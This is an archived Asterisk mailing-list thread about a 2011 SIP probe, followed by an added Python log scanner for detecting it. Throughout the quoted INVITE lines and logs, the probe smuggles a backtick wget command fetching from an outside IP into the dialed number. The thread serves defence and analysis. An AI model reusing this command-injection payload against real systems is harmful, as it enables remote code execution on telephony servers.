Tom Browning
2011-Sep-11 23:05 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
I haven't seen this sort of URI/shell attack prior to today but it looks interesting. Embedding a backtick in the URI with a wget that doesn't seem to do much to an empty file. I'm guessing it is just a probe to see if they can send further embedded backtick shell commands to my Asterisk instance (by watching their weblogs @ 91.223.89.94). (This happens to be my "honeypot" that just accepts all calls and dumps them into one big Asterisk 10 beta ConfBridge :-)

INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.
INVITE sip:011123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x SIP/2.0.

Does Asterisk have a shell injection weakness? Or perhaps this targets some other Asterisk config manager that is subject to injection via URI?

Tom
Alex Balashov
2011-Sep-11 23:20 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
On 09/11/2011 07:05 PM, Tom Browning wrote:
> INVITE sip:00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@x.x.x.x
> SIP/2.0.

My guess is that this attack presumes you are running a web GUI such as FreePBX, and that it does not sanitise embedded HTML. Thus, when reviewing your CDRs, for instance, you might click on such a link. A more sophisticated variant of that would embed <script> tags with a shortened URL (overall small enough to fit inside a SIP display name field or whatnot) to effectuate a cross-site scripting attack.

--
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
Saqib Butt
2011-Sep-12 21:02 UTC
[asterisk-users] new sort of shell attack attempt via SIP?
I have seen this recently in my logs as well:

[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:3] Goto("SIP/5060-0000002c", "s,1") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,s,1)
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Goto (from-sip-external,//91.223.89.94/V.php`,1)

So can this be blocked via fail2ban by adding a new regex?

Thanks
Saqib
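A defender-side check for the kind of log lines Saqib posted, added here as an example (it is not code from the thread or from Asterisk): it parses verbose "Executing" records, flags any whose extension or application arguments carry shell metacharacters, decodes Asterisk's \xNN escapes and pulls out the embedded URL. The sample log is constructed from the records quoted above with one clean call appended; the regexes and function names are my own.

```python
import re

# Constructed sample modelled on the verbose lines quoted in the thread, one
# record per line (the list archive wrapped them). Asterisk writes unprintable
# bytes as \xNN, so the backslashes are literal; the last record is a clean call.
SAMPLE_LOG = r"""
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:1] NoOp("SIP/5060-0000002c", "Received incoming SIP connection from unknown peer to 00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`@from-sip-external:2] Set("SIP/5060-0000002c", "DID=00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`") in new stack
[2011-09-10 20:34:33] VERBOSE[14939] logger.c: -- Executing [s@from-sip-external:1] GotoIf("SIP/5060-0000002c", "0?from-trunk,00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`,1") in new stack
[2011-09-10 20:35:01] VERBOSE[14939] logger.c: -- Executing [18005551212@from-sip-external:1] NoOp("SIP/5060-0000002d", "normal call") in new stack
"""

# One dialplan "Executing" record: extension, context, priority, application,
# channel and the application's argument string.
EXEC_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] VERBOSE\[\d+\] \S+: -- Executing '
    r'\[(?P<exten>.*?)@(?P<context>[^@:\]]+):(?P<prio>\d+)\] '
    r'(?P<app>\w+)\("(?P<chan>[^"]+)",\s*"(?P<args>.*)"\) in new stack$'
)
# Characters that matter only if the value is ever handed to a shell
# (System()/TrySystem(), AGI scripts, a GUI building commands from CDRs).
# Variables are already expanded in these records, so a literal $ is odd too.
SHELL_META = re.compile(r'[`$;|&]')
URL_RE = re.compile(r'https?://[^\s"`\']+')


def unescape_asterisk(value):
    # Turn Asterisk's \xNN escapes back into characters for human review.
    return re.sub(r'\\x([0-9a-fA-F]{2})',
                  lambda m: chr(int(m.group(1), 16)), value)


def scan_asterisk_log(text):
    # One finding per Executing record whose extension or application
    # arguments contain shell metacharacters; the extension is checked first.
    findings = []
    for line in text.splitlines():
        m = EXEC_RE.match(line)
        if not m:
            continue
        for field in ('exten', 'args'):
            value = m.group(field)
            if SHELL_META.search(value):
                findings.append({
                    'timestamp': m.group('ts'), 'channel': m.group('chan'),
                    'context': m.group('context'), 'field': field,
                    'decoded': unescape_asterisk(value),
                    'urls': URL_RE.findall(value)})
                break
    return findings
```

Note that these verbose records say "from unknown peer" and carry no source address, so a fail2ban filter written over them has nothing to bind to <HOST>; they are useful for spotting the pattern, while the ban itself has to key off a log line that records the peer's IP.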